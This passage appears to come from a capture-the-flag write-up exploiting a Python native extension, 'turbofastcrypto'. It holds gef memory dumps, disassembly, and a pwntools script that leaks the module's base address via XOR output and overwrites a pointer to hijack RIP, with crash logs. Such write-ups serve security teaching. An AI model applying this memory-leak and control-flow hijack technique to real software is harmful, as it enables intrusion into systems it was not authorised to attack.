0x5f6572615f737465 <span class="gp">0x7fdc26804070 &lt;IV+16&gt;</span>: 0x64656c6165766572 0x00000000007d2121 <span class="gp">0x7fdc26804080 &lt;IV+32&gt;</span>: 0x0000000000000000 0x0000000000000000 <span class="gp">0x7fdc26804090 &lt;IV+48&gt;</span>: 0x0000000000000000 0x0000000000000000 <span class="gp">0x7fdc268040a0 &lt;mtds&gt;</span>: 0x00007fdc2680200c 0x00007fdc268011c0 <span class="gp">0x7fdc268040b0 &lt;mtds+16&gt;</span>: 0x0000000000000001 0x00007fdc26802014 <span class="gp">0x7fdc268040c0 &lt;mtds+32&gt;</span>: 0x0000000000000000 0x0000000000000000 <span class="gp">0x7fdc268040d0 &lt;mtds+48&gt;</span>: 0x0000000000000000 0x0000000000000000 <span class="gp">0x7fdc268040e0 &lt;moddef&gt;</span>: 0x0000000000000002 0x000000000090ffa0 <span class="gp">0x7fdc268040f0 &lt;moddef+16&gt;</span>: 0x00007fdc26801290 0x000000000000000f <span class="gp">0x7fdc26804100 &lt;moddef+32&gt;</span>: 0x00007fdc25794480 0x00007fdc26802025 <span class="gp">0x7fdc26804110 &lt;moddef+48&gt;</span>: 0x0000000000000000 0xffffffffffffffff <span class="gp">0x7fdc26804120 &lt;moddef+64&gt;</span>: 0x00007fdc268040a0 0x0000000000000000 <span class="gp">0x7fdc26804130 &lt;moddef+80&gt;</span>: 0x0000000000000000 0x0000000000000000 <span class="gp">0x7fdc26804140 &lt;moddef+96&gt;</span>: 0x0000000000000000 0x0000000000000000 <span class="go">0x7fdc26804150: 0x332e392075746e75 0x75627537312d302e gef➤ </span></code></pre></div></div> <p>Testing the first pointer <code class="language-plaintext highlighter-rouge">0x00007fdc2680200c</code> shows that it lies at an offset of <code class="language-plaintext highlighter-rouge">0x200c</code> or <code class="language-plaintext highlighter-rouge">8204</code> from the base address of the shared object.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gef➤ vmmap turbofastcrypto.cpython-38-x86_64-linux-gnu.so [ Legend: Code | Heap | Stack ] Start End Offset Perm Path 0x00007fdc26800000 0x00007fdc26801000 0x0000000000000000 r-- /vagrant/sieberrsec/tfc/distrib_turbofastcrypto_old/turbofastcrypto.cpython-38-x86_64-linux-gnu.so 0x00007fdc26801000 0x00007fdc26802000 0x0000000000001000 r-x /vagrant/sieberrsec/tfc/distrib_turbofastcrypto_old/turbofastcrypto.cpython-38-x86_64-linux-gnu.so 0x00007fdc26802000 0x00007fdc26803000 0x0000000000002000 r-- /vagrant/sieberrsec/tfc/distrib_turbofastcrypto_old/turbofastcrypto.cpython-38-x86_64-linux-gnu.so 0x00007fdc26803000 0x00007fdc26804000 0x0000000000002000 r-- /vagrant/sieberrsec/tfc/distrib_turbofastcrypto_old/turbofastcrypto.cpython-38-x86_64-linux-gnu.so 0x00007fdc26804000 0x00007fdc26805000 0x0000000000003000 rw- /vagrant/sieberrsec/tfc/distrib_turbofastcrypto_old/turbofastcrypto.cpython-38-x86_64-linux-gnu.so gef➤ vmmap 0x00007fdc268011c0 - 0x00007fdc26800000 [ Legend: Code | Heap | Stack ] Start End Offset Perm Path 0x00007fdc26801000 0x00007fdc26802000 0x0000000000001000 r-x /vagrant/sieberrsec/tfc/distrib_turbofastcrypto_old/turbofastcrypto.cpython-38-x86_64-linux-gnu.so gef➤ p 0x00007fdc2680200c - 0x00007fdc26800000 </span><span class="gp">$</span>9 <span class="o">=</span> 0x200c <span class="go">gef➤ </span></code></pre></div></div> <p>Thus, we can use the XOR operation to leak this address, calculate the base address from it, and finally derive the <code class="language-plaintext highlighter-rouge">print_flag</code> address. A quick proof-of-concept script was created to test the leak and RIP control. To begin with, an address of <code class="language-plaintext highlighter-rouge">0x4242424242424242</code> was used for validation.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python </span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">mtds_offset</span> <span class="o">=</span> <span class="mi">8204</span> <span class="n">printflag_offset</span> <span class="o">=</span> <span class="mh">0x11a0</span> <span class="n">context</span><span class="p">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s">'debug'</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="c1">#p = remote("challs.sieberrsec.tech", 3477) </span> <span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">([</span><span class="s">"python"</span><span class="p">,</span> <span class="s">"tfc.py"</span><span class="p">])</span> <span class="c1"># Leak the base address of the shared object. </span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt;'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s">'A'</span><span class="o">*</span><span class="mi">72</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'Encrypted: '</span><span class="p">)</span> <span class="n">leak</span> <span class="o">=</span> <span class="n">xor</span><span class="p">(</span><span class="n">util</span><span class="p">.</span><span class="n">safeeval</span><span class="p">.</span><span class="n">expr</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="n">recvline</span><span class="p">())[</span><span class="o">-</span><span class="mi">8</span><span class="p">:],</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">)</span> <span class="n">mtds_leak</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">leak</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'mtds leak: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">mtds_leak</span><span class="p">)))</span> <span class="n">so_base</span> <span class="o">=</span> <span class="n">mtds_leak</span> <span class="o">-</span> <span class="n">mtds_offset</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'shared object base: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">so_base</span><span class="p">)))</span> <span class="n">printflag</span> <span class="o">=</span> <span class="n">so_base</span> <span class="o">+</span> <span class="n">printflag_offset</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'print_flag: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">printflag</span><span class="p">)))</span> <span class="c1"># Send the exploit. </span> <span class="nb">input</span><span class="p">()</span> <span class="n">printflag</span> <span class="o">=</span> <span class="mh">0x4242424242424242</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">p64</span><span class="p">(</span><span class="n">printflag</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">payload</span><span class="p">.</span><span class="n">rjust</span><span class="p">(</span><span class="mi">208</span><span class="o">+</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s">'A'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt;'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="c1"># Trigger </span> <span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'A'</span><span class="o">*</span><span class="mi">208</span> <span class="n">p</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s">'&gt;'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">main</span><span class="p">()</span> </code></pre></div></div> <p>Running the script shows the expected crash:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>python exploit.py <span class="go">[+] Starting local process '/home/vagrant/.pyenv/versions/3.8.9/bin/python' argv=[b'python', b'tfc.py'] : pid 14968 [DEBUG] Received 0x2 bytes: </span><span class="gp"> b'&gt;</span><span class="w"> </span><span class="s1">' </span><span class="go">[DEBUG] Sent 0x49 bytes: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n' [DEBUG] Received 0x74 bytes: </span><span class="gp"> b'Encrypted: b\'\\x08\\x13\\x12:2$</span><span class="s2">"3</span><span class="nv">$52</span><span class="se">\\</span><span class="s2">x1e 3</span><span class="nv">$\</span><span class="se">\x</span><span class="s2">1e3</span><span class="nv">$7$ </span><span class="s2">-</span><span class="nv">$%</span><span class="sb">``</span><span class="s2">&lt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAM</span><span class="se">\\</span><span class="s2">x91</span><span class="se">\\</span><span class="s2">x14</span><span class="se">\\</span><span class="s2">xec</span><span class="se">\\</span><span class="s2">xd0&gt;AA</span><span class="se">\'\n</span><span class="s2">' </span><span class="gp"> b'&gt;</span><span class="w"> </span><span class="s2">' </span><span class="go">[*] mtds leak: 0x7f91ad55d00c [*] shared object base: 0x7f91ad55b000 [*] print_flag: 0x7f91ad55c1a0 [DEBUG] Sent 0xd9 bytes: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBB\n' [DEBUG] Received 0x1e2 bytes: </span><span class="gp"> b"Encrypted: b'IRS{secrets_are_revealed!!}\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\xd0U\\xad\\x91\\x7f\\x00\\x00\\x81\\x80\\x14\\xec\\xd0&gt;</span>AA@AAAAAAAU<span class="se">\\</span>x91<span class="se">\\</span>x14<span class="se">\\</span>xec<span class="se">\\</span>xd0&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAA<span class="se">\\</span>xe1<span class="se">\\</span>xbe<span class="se">\\</span>xd1AAAAA<span class="se">\\</span>xd1<span class="se">\\</span>x83<span class="se">\\</span>x14<span class="se">\\</span>xec<span class="se">\\</span>xd0&gt;AANAAAAAAA<span class="se">\\</span>xc1<span class="se">\\</span>xb5<span class="se">\\</span>x0f<span class="se">\\</span>xed<span class="se">\\</span>xd0&gt;AAd<span class="se">\\</span>x91<span class="se">\\</span>x14<span class="se">\\</span>xec<span class="se">\\</span>xd0&gt;AAAAAAAAAA<span class="se">\\</span>xbe<span class="se">\\</span>xbe<span class="se">\\</span>xbe<span class="se">\\</span>xbe<span class="se">\\</span>xbe<span class="se">\\</span>xbe<span class="se">\\</span>xbe<span class="se">\\</span>xbe<span class="se">\\</span>xe1<span class="se">\\</span>xb1<span class="se">\\</span>x14<span class="se">\\</span>xec<span class="se">\\</span>xd0&gt;AAAAAAAAAABBBBBBBB<span class="s1">'\n" </span><span class="gp"> b'&gt;</span><span class="w"> </span><span class="s1">'</span> <span class="go">[DEBUG] Sent 0xd1 bytes: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n' [*] Switching to interactive mode </span><span class="gp">AA@AAAAAAAU\x91\x14\xec\xd0&gt;</span>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAA<span class="se">\x</span>e1<span class="se">\x</span>be<span class="se">\x</span>d1AAAAA<span class="se">\x</span>d1<span class="se">\x</span>83<span class="se">\x</span>14<span class="se">\x</span>ec<span class="se">\x</span>d0&gt;AANAAAAAAA<span class="se">\x</span>c1<span class="se">\x</span>b5<span class="se">\x</span>0f<span class="se">\x</span>ed<span class="se">\x</span>d0&gt;AAd<span class="se">\x</span>91<span class="se">\x</span>14<span class="se">\x</span>ec<span class="se">\x</span>d0&gt;AAAAAAAAAA<span class="se">\x</span>be<span class="se">\x</span>be<span class="se">\x</span>be<span class="se">\x</span>be<span class="se">\x</span>be<span class="se">\x</span>be<span class="se">\x</span>be<span class="se">\x</span>be<span class="se">\x</span>e1<span class="se">\x</span>b1<span class="se">\x</span>14<span class="se">\x</span>ec<span class="se">\x</span>d0&gt;AAAAAAAAAABBBBBBBB<span class="s1">' </span><span class="gp">&gt;</span><span class="w"> </span><span class="s1">[DEBUG] Received 0xc7 bytes: </span><span class="go"> b'Traceback (most recent call last):\n' </span><span class="gp"> b' File "tfc.py", line 4, in &lt;module&gt;</span><span class="se">\n</span><span class="s1">' </span><span class="go"> b' ciphertext = turbofastcrypto.encrypt(plaintext)\n' b"TypeError: 'builtin_function_or_method' object does not support vectorcall\n" Traceback (most recent call last): </span><span class="gp"> File "tfc.py", line 4, in &lt;module&gt;</span><span class="w"> </span><span class="go"> ciphertext = turbofastcrypto.encrypt(plaintext) TypeError: 'builtin_function_or_method' object does not support vectorcall </span><span class="gp">$</span><span class="w"> </span></code></pre></div></div> <p>And checking the crash in a debugger shows that the RIP control works.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gef➤ c Continuing. Thread 1 "python" received signal SIGSEGV, Segmentation fault. </span><span class="gp">module_traverse (m=0x7f91ac4eec20, visit=0x54f930 &lt;visit_decref&gt;</span>, <span class="nv">arg</span><span class="o">=</span>0x7f91ac4eec20<span class="o">)</span> at Objects/moduleobject.c:775 <span class="go">775 Objects/moduleobject.c: No such file or directory. [ Legend: Modified register | Code | Heap | Stack | String ] ─────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ──── </span><span class="gp">$</span>rax : 0x4242424242424242 <span class="o">(</span><span class="s2">"BBBBBBBB"</span>?<span class="o">)</span> <span class="gp">$</span>rbx : 0x00007f91ac4eec20 → 0x0000000000000004 <span class="gp">$</span>rcx : 0x00007f91ac61d058 → 0xffffffff05ff0302 <span class="c">... </span><span class="go">───────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ──── </span><span class="gp"> 0x474286 &lt;module_traverse+22&gt;</span><span class="w"> </span>mov rax, QWORD PTR <span class="o">[</span>rax+0x50] <span class="gp"> 0x47428a &lt;module_traverse+26&gt;</span><span class="w"> </span><span class="nb">test </span>rax, rax <span class="gp"> 0x47428d &lt;module_traverse+29&gt;</span><span class="w"> </span>je 0x474295 &lt;module_traverse+37&gt; <span class="gp"> → 0x47428f &lt;module_traverse+31&gt;</span><span class="w"> </span>call rax <span class="gp"> 0x474291 &lt;module_traverse+33&gt;</span><span class="w"> </span><span class="nb">test </span>eax, eax <span class="gp"> 0x474293 &lt;module_traverse+35&gt;</span><span class="w"> </span>jne 0x4742b0 &lt;module_traverse+64&gt; <span class="gp"> 0x474295 &lt;module_traverse+37&gt;</span><span class="w"> </span>mov rdi, QWORD PTR <span class="o">[</span>rbx+0x10] <span class="gp"> 0x474299 &lt;module_traverse+41&gt;</span><span class="w"> </span>xor eax, eax <span class="gp"> 0x47429b &lt;module_traverse+43&gt;</span><span class="w"> </span><span class="nb">test </span>rdi, rdi <span class="go">───────────────────────────────────────────────────────────────────────────────────────────────────── arguments (guessed) ──── *0x4242424242424242 ( ) ───────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ──── </span><span class="gp">[#</span>0] Id 1, Name: <span class="s2">"python"</span>, stopped 0x47428f <span class="k">in </span>module_traverse <span class="o">()</span>, reason: SIGSEGV <span class="go">─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ──── </span><span class="gp">[#</span>0] 0x47428f → module_traverse<span class="o">(</span><span class="nv">m</span><span class="o">=</span>0x7f91ac4eec20, <span class="nv">visit</span><span class="o">=</span>0x54f930 &lt;visit_decref&gt;, <span class="nv">arg</span><span class="o">=</span>0x7f91ac4eec20<span class="o">)</span> <span class="gp">[#</span>1] 0x550256 → subtract_refs<span class="o">(</span><span class="nv">containers</span><span class="o">=</span>&lt;optimized out&gt;<span class="o">)</span> <span class="gp">[#</span>2] 0x550256 → collect<span class="o">(</span><span class="nv">generation</span><span class="o">=</span>0x2, <span class="nv">n_collected</span><span class="o">=</span>0x7ffc1694cda8, <span class="nv">n_uncollectable</span><span class="o">=</span>0x7ffc1694cdb0, <span class="nv">nofail</span><span class="o">=</span>0x0, <span class="nv">state</span><span class="o">=</span>&lt;optimized out&gt;<span class="o">)</span> <span class="gp">[#</span>3] 0x551673 → collect_with_callback<span class="o">(</span><span class="nv">state</span><span class="o">=</span>&lt;optimized out&gt;, <span class="nv">generation</span><span class="o">=</span>0x2<span class="o">)</span> <span class="gp">[#</span>4] 0x551673 → PyGC_Collect<span class="o">()</span> <span class="gp">[#</span>5] 0x551673 → _PyGC_CollectIfEnabled<span class="o">()</span> <span class="gp">[#</span>6] 0x524937 → Py_FinalizeEx<span class="o">()</span> <span class="gp">[#</span>7] 0x5262c5 → Py_FinalizeEx<span class="o">()</span> <span class="gp">[#</span>8] 0x42cb9b → Py_RunMain<span class="o">()</span> <span class="gp">[#</span>9] 0x42d574 → pymain_main<span class="o">(</span><span class="nv">args</span><span class="o">=</span>0x7ffc1694cf00<span class="o">)</span> <span class="go">────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── gef➤ </span></code></pre></div></div> <p>However, when fixing up the <code class="language-plaintext highlighter-rouge">print_flag</code> address to use the actual leaked one, we encounter UTF-8 decoding issues. Unfortunately, we cannot encode 6 bytes of arbitrary code points in <a href="https://en.wikipedia.org/wiki/UTF-8">UTF-8</a>. Only a maximum of 4 bytes is possible. Hence, we cannot properly encode the 6 contiguous bytes required to specify the address.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>python exploit.py <span class="go">[+] Starting local process '/home/vagrant/.pyenv/versions/3.8.9/bin/python' argv=[b'python', b'tfc.py'] : pid 15198 [DEBUG] Received 0x2 bytes: </span><span class="gp"> b'&gt;</span><span class="w"> </span><span class="s1">' </span><span class="go">[DEBUG] Sent 0x49 bytes: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n' [DEBUG] Received 0x71 bytes: </span><span class="gp"> b'Encrypted: b\'\\x08\\x13\\x12:2$</span><span class="s2">"3</span><span class="nv">$52</span><span class="se">\\</span><span class="s2">x1e 3</span><span class="nv">$\</span><span class="se">\x</span><span class="s2">1e3</span><span class="nv">$7$ </span><span class="s2">-</span><span class="nv">$%</span><span class="sb">``</span><span class="s2">&lt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAM!</span><span class="se">\\</span><span class="s2">x9c</span><span class="se">\\</span><span class="s2">xf6</span><span class="se">\\</span><span class="s2">xff&gt;AA</span><span class="se">\'\n</span><span class="s2">' </span><span class="gp"> b'&gt;</span><span class="w"> </span><span class="s2">' </span><span class="go">[*] mtds leak: 0x7fbeb7dd600c [*] shared object base: 0x7fbeb7dd4000 [*] print_flag: 0x7fbeb7dd51a0 [DEBUG] Sent 0xd9 bytes: 00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│ * 000000d0 a0 51 dd b7 be 7f 00 00 0a │·Q··│····│·│ 000000d9 [DEBUG] Received 0x48 bytes: b'Traceback (most recent call last):\n' </span><span class="gp"> b' File "tfc.py", line 3, in &lt;module&gt;</span><span class="se">\n</span><span class="s1">' </span><span class="go">[DEBUG] Sent 0xd1 bytes: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n' [*] Switching to interactive mode [*] Process '/home/vagrant/.pyenv/versions/3.8.9/bin/python' stopped with exit code 1 (pid 15198) [DEBUG] Received 0x11a bytes: </span><span class="gp"> b" plaintext = input('&gt;</span><span class="w"> </span><span class="s1">')\n" </span><span class="go"> b' File "/home/vagrant/.pyenv/versions/3.8.9/lib/python3.8/codecs.py", line 322, in decode\n' b' (result, consumed) = self._buffer_decode(data, self.errors, final)\n' b"UnicodeDecodeError: 'utf-8' codec can't decode byte 0xa0 in position 208: invalid start byte\n" </span><span class="gp"> plaintext = input('&gt;</span><span class="w"> </span><span class="s1">') </span><span class="go"> File "/home/vagrant/.pyenv/versions/3.8.9/lib/python3.8/codecs.py", line 322, in decode (result, consumed) = self._buffer_decode(data, self.errors, final) UnicodeDecodeError: 'utf-8' codec can't decode byte 0xa0 in position 208: invalid start byte [*] Got EOF while reading in interactive </span><span class="gp">$</span><span class="w"> </span></code></pre></div></div> <p>Coming back to the analysis of the memory layout, we can inspect the pointers we leaked earlier. The first pointer in the <code class="language-plaintext highlighter-rouge">mtds</code> struct points to the name of the function <code class="language-plaintext highlighter-rouge">encrypt</code>.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gef➤ x/32xg IV </span><span class="gp">0x7fdc26804060 &lt;IV&gt;</span>: 0x726365737b535249 0x5f6572615f737465 <span class="gp">0x7fdc26804070 &lt;IV+16&gt;</span>: 0x64656c6165766572 0x00000000007d2121 <span class="gp">0x7fdc26804080 &lt;IV+32&gt;</span>: 0x0000000000000000 0x0000000000000000 <span class="gp">0x7fdc26804090 &lt;IV+48&gt;</span>: 0x0000000000000000 0x0000000000000000 <span class="gp">0x7fdc268040a0 &lt;mtds&gt;</span>: 0x00007fdc2680200c 0x00007fdc268011c0 <span class="gp">0x7fdc268040b0 &lt;mtds+16&gt;</span>: 0x0000000000000001 0x00007fdc26802014 <span class="gp">0x7fdc268040c0 &lt;mtds+32&gt;</span>: 0x0000000000000000 0x0000000000000000 <span class="gp">0x7fdc268040d0 &lt;mtds+48&gt;</span>: 0x0000000000000000 0x0000000000000000 <span class="gp">0x7fdc268040e0 &lt;moddef&gt;</span>: 0x0000000000000002 0x000000000090ffa0 <span class="gp">0x7fdc268040f0 &lt;moddef+16&gt;</span>: 0x00007fdc26801290 0x000000000000000f <span class="gp">0x7fdc26804100 &lt;moddef+32&gt;</span>: 0x00007fdc25794480 0x00007fdc26802025 <span class="gp">0x7fdc26804110 &lt;moddef+48&gt;</span>: 0x0000000000000000 0xffffffffffffffff <span class="gp">0x7fdc26804120 &lt;moddef+64&gt;</span>: 0x00007fdc268040a0 0x0000000000000000 <span class="gp">0x7fdc26804130 &lt;moddef+80&gt;</span>: 0x0000000000000000 0x0000000000000000 <span class="gp">0x7fdc26804140 &lt;moddef+96&gt;</span>: 0x0000000000000000 0x0000000000000000 <span class="go">0x7fdc26804150: 0x332e392075746e75 0x75627537312d302e gef➤ x/s 0x00007fdc268011c0 </span><span class="gp">0x7fdc268011c0 &lt;encrypt&gt;</span>: <span class="s2">"</span><span class="se">\3</span><span class="s2">63</span><span class="se">\0</span><span class="s2">17</span><span class="se">\0</span><span class="s2">36</span><span class="se">\3</span><span class="s2">72UH</span><span class="se">\2</span><span class="s2">11</span><span class="se">\3</span><span class="s2">45H</span><span class="se">\2</span><span class="s2">03</span><span class="se">\3</span><span class="s2">54</span><span class="se">\0</span><span class="s2">60H</span><span class="se">\2</span><span class="s2">11}</span><span class="se">\3</span><span class="s2">30H</span><span class="se">\2</span><span class="s2">11u</span><span class="se">\3</span><span class="s2">20dH</span><span class="se">\2</span><span class="s2">13</span><span class="se">\0</span><span class="s2">04%("</span> <span class="go">gef➤ </span></code></pre></div></div> <p>The second pointer points to the code segment, namely, the body of the <code class="language-plaintext highlighter-rouge">encrypt</code> function. This object is the <a href="https://docs.python.org/3/c-api/structures.html#c.PyMethodDef"><code class="language-plaintext highlighter-rouge">PyMethodDef</code></a> structure used in exposing native modules to Python scripts.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gef➤ disas 0x00007fdc268011c0 Dump of assembler code for function encrypt: </span><span class="gp">=&gt;</span><span class="w"> </span>0x00007fdc268011c0 &lt;+0&gt;: repz nop edx <span class="gp"> 0x00007fdc268011c4 &lt;+4&gt;</span>: push rbp <span class="gp"> 0x00007fdc268011c5 &lt;+5&gt;</span>: mov rbp,rsp <span class="gp"> 0x00007fdc268011c8 &lt;+8&gt;</span>: sub rsp,0x30 <span class="gp"> 0x00007fdc268011cc &lt;+12&gt;</span>: mov QWORD PTR <span class="o">[</span>rbp-0x28],rdi <span class="gp"> 0x00007fdc268011d0 &lt;+16&gt;</span>: mov QWORD PTR <span class="o">[</span>rbp-0x30],rsi <span class="gp"> 0x00007fdc268011d4 &lt;+20&gt;</span>: mov rax,QWORD PTR fs:0x28 <span class="gp"> 0x00007fdc268011dd &lt;+29&gt;</span>: mov QWORD PTR <span class="o">[</span>rbp-0x8],rax <span class="gp"> 0x00007fdc268011e1 &lt;+33&gt;</span>: xor eax,eax <span class="gp"> 0x00007fdc268011e3 &lt;+35&gt;</span>: lea rcx,[rbp-0x10] <span class="gp"> 0x00007fdc268011e7 &lt;+39&gt;</span>: lea rdx,[rbp-0x18] <span class="gp"> 0x00007fdc268011eb &lt;+43&gt;</span>: mov rax,QWORD PTR <span class="o">[</span>rbp-0x30] <span class="gp"> 0x00007fdc268011ef &lt;+47&gt;</span>: lea rsi,[rip+0xe13] <span class="c"># 0x7fdc26802009</span> <span class="gp"> 0x00007fdc268011f6 &lt;+54&gt;</span>: mov rdi,rax <span class="gp"> 0x00007fdc268011f9 &lt;+57&gt;</span>: mov eax,0x0 <span class="gp"> 0x00007fdc268011fe &lt;+62&gt;</span>: call 0x7fdc268010d0 <span class="gp"> 0x00007fdc26801203 &lt;+67&gt;</span>: <span class="nb">test </span>eax,eax <span class="gp"> 0x00007fdc26801205 &lt;+69&gt;</span>: jne 0x7fdc2680120e &lt;encrypt+78&gt; <span class="gp"> 0x00007fdc26801207 &lt;+71&gt;</span>: mov eax,0x0 <span class="gp"> 0x00007fdc2680120c &lt;+76&gt;</span>: jmp 0x7fdc26801270 &lt;encrypt+176&gt; <span class="gp"> 0x00007fdc2680120e &lt;+78&gt;</span>: mov DWORD PTR <span class="o">[</span>rbp-0x1c],0x0 <span class="gp"> 0x00007fdc26801215 &lt;+85&gt;</span>: jmp 0x7fdc2680124b &lt;encrypt+139&gt; <span class="gp"> 0x00007fdc26801217 &lt;+87&gt;</span>: mov rdx,QWORD PTR <span class="o">[</span>rip+0x2dd2] <span class="c"># 0x7fdc26803ff0</span> <span class="gp"> 0x00007fdc2680121e &lt;+94&gt;</span>: mov eax,DWORD PTR <span class="o">[</span>rbp-0x1c] <span class="gp"> 0x00007fdc26801221 &lt;+97&gt;</span>: cdqe <span class="gp"> 0x00007fdc26801223 &lt;+99&gt;</span>: movzx ecx,BYTE PTR <span class="o">[</span>rdx+rax<span class="k">*</span>1] <span class="gp"> 0x00007fdc26801227 &lt;+103&gt;</span>: mov rdx,QWORD PTR <span class="o">[</span>rbp-0x18] <span class="gp"> 0x00007fdc2680122b &lt;+107&gt;</span>: mov eax,DWORD PTR <span class="o">[</span>rbp-0x1c] <span class="gp"> 0x00007fdc2680122e &lt;+110&gt;</span>: cdqe <span class="gp"> 0x00007fdc26801230 &lt;+112&gt;</span>: add rax,rdx <span class="gp"> 0x00007fdc26801233 &lt;+115&gt;</span>: movzx eax,BYTE PTR <span class="o">[</span>rax] <span class="gp"> 0x00007fdc26801236 &lt;+118&gt;</span>: xor ecx,eax <span class="gp"> 0x00007fdc26801238 &lt;+120&gt;</span>: mov rdx,QWORD PTR <span class="o">[</span>rip+0x2db1] <span class="c"># 0x7fdc26803ff0</span> <span class="gp"> 0x00007fdc2680123f &lt;+127&gt;</span>: mov eax,DWORD PTR <span class="o">[</span>rbp-0x1c] <span class="gp"> 0x00007fdc26801242 &lt;+130&gt;</span>: cdqe <span class="gp"> 0x00007fdc26801244 &lt;+132&gt;</span>: mov BYTE PTR <span class="o">[</span>rdx+rax<span class="k">*</span>1],cl <span class="gp"> 0x00007fdc26801247 &lt;+135&gt;</span>: add DWORD PTR <span class="o">[</span>rbp-0x1c],0x1 <span class="gp"> 0x00007fdc2680124b &lt;+139&gt;</span>: mov eax,DWORD PTR <span class="o">[</span>rbp-0x1c] <span class="gp"> 0x00007fdc2680124e &lt;+142&gt;</span>: movsxd rdx,eax <span class="gp"> 0x00007fdc26801251 &lt;+145&gt;</span>: mov rax,QWORD PTR <span class="o">[</span>rbp-0x10] <span class="gp"> 0x00007fdc26801255 &lt;+149&gt;</span>: cmp rdx,rax <span class="gp"> 0x00007fdc26801258 &lt;+152&gt;</span>: jl 0x7fdc26801217 &lt;encrypt+87&gt; <span class="gp"> 